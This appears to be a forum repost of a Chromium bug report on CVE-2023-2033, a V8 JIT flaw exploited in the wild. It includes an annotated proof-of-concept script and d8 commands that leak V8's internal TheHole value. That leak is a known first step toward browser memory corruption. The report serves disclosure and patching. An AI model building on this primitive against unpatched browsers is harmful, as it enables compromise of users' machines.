Chrome actively exploited 0-day vulnerability (CVE-2023-2033)
[0day] JIT optimisation issue(Issue 1432210, CVE-2023-2033, Blink>JavaScript>Runtime & Blink>JavaScript>Compiler)
Как воспроизвести?
TheHole leaked when using optimization
Same code fails with no optimization.
hole.js
[0day] JIT optimisation issue(Issue 1432210, CVE-2023-2033, Blink>JavaScript>Runtime & Blink>JavaScript>Compiler)
There seems to be a JIT optimisation issue allowing an attacker to leak the TheHole value. Filing this bug now as it is used ITW and we have a PoC demonstrating the issue. This might be an issue similar to CVE-2022-1364
Как воспроизвести?
TheHole leaked when using optimization
Код:
$ ./d8 --allow-natives-syntax hole.js
Код:
$ ./d8 --allow-natives-syntax --no-opt hole.js
hole.js
JavaScript:
// Reproducer for CVE-2023-2033 (Issue 1432210) as posted in the bug report.
// It is meant to be run as `./d8 --allow-natives-syntax hole.js`; the report
// states the same script under `--no-opt` does not show the leak, which is
// what points at the optimising compiler rather than the runtime.
// NOTE(review): the trigger depends on the exact statement order below
// (property redefinition, JIT warm-up, then the final call), so the code is
// left as posted and only annotated.
var h0le = [Object]; // one-element array; slot 0 is overwritten by rGlobal()
function boom() {
  var h00le = h0le; // local alias of the global array
  // Copies the value of the global `stack` into slot 0 and returns the array.
  // `stack` is a free variable here, so each call resolves it on globalThis.
  function rGlobal() {
    h00le[0] = stack;
    return h00le;
  }
  // Installs a `stack` property on globalThis; in V8 its value is formatted
  // lazily, and Error.prepareStackTrace (set next) runs on that first read.
  Error.captureStackTrace(globalThis);
  Error.prepareStackTrace = function() {
    // Runs re-entrantly, in the middle of whichever statement below first
    // reads `stack` -- presumably the Reflect.defineProperty that follows;
    // confirm against the issue's analysis.
    Reflect.deleteProperty(Error, 'prepareStackTrace'); // one-shot hook
    Reflect.deleteProperty(globalThis, 'stack');
    // Replace the lazily-formatted property with a plain, non-configurable
    // data property holding 1.
    Reflect.defineProperty(
      globalThis, 'stack',
      {configurable: false, writable: true, enumerable: true, value: 1});
    stack = undefined;
    // Warm-up loop: 0x5000 calls of rGlobal() so the optimising compiler
    // compiles it while `stack` is a writable global data property.
    for (let i = 0; i < 0x5000; i++) {
      rGlobal();
    }
    return undefined;
  };
  // Redefine `stack` as configurable, then remove it from globalThis.
  // (Reflect.defineProperty / sloppy-mode delete report failure by returning
  // false rather than throwing, so neither result is checked here.)
  Reflect.defineProperty(
    globalThis, 'stack',
    {configurable: true, writable: true, enumerable: true, value: undefined});
  delete globalThis.stack;
  // Final call after the global was removed. Per the bug report, optimised
  // code ends up storing TheHole (V8's internal "empty slot" marker) into
  // h0le[0] instead of observing the missing global; the unoptimised path
  // does not leak it.
  rGlobal();
  // the hole?!  -- %DebugPrint is a d8 intrinsic; needs --allow-natives-syntax.
  %DebugPrint(h0le[0]);
}
boom();